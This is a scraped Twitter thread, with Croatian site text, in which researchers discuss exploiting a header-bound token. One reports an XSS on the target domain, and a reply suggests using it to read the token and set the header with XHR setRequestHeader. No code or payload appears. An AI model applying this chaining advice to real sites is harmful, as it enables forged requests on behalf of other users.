AFAIK it can't be exploited because how could you forge a header for other user (Unless you could perform HTTP request smuggling or CRLF) and also you would require xss or crlf for cookie manipulation.
-
-
-
Right. I do have an XSS on that domain but how to add Header for the other user though? CRLF?
- Još 2 druga odgovora
Novi razgovor -
-
-
Can you access that token value from your xss , if yes then you can add header using xhr setheader() Reference :https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/setRequestHeader …
-
Thanks man. :)
Kraj razgovora
Novi razgovor -
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.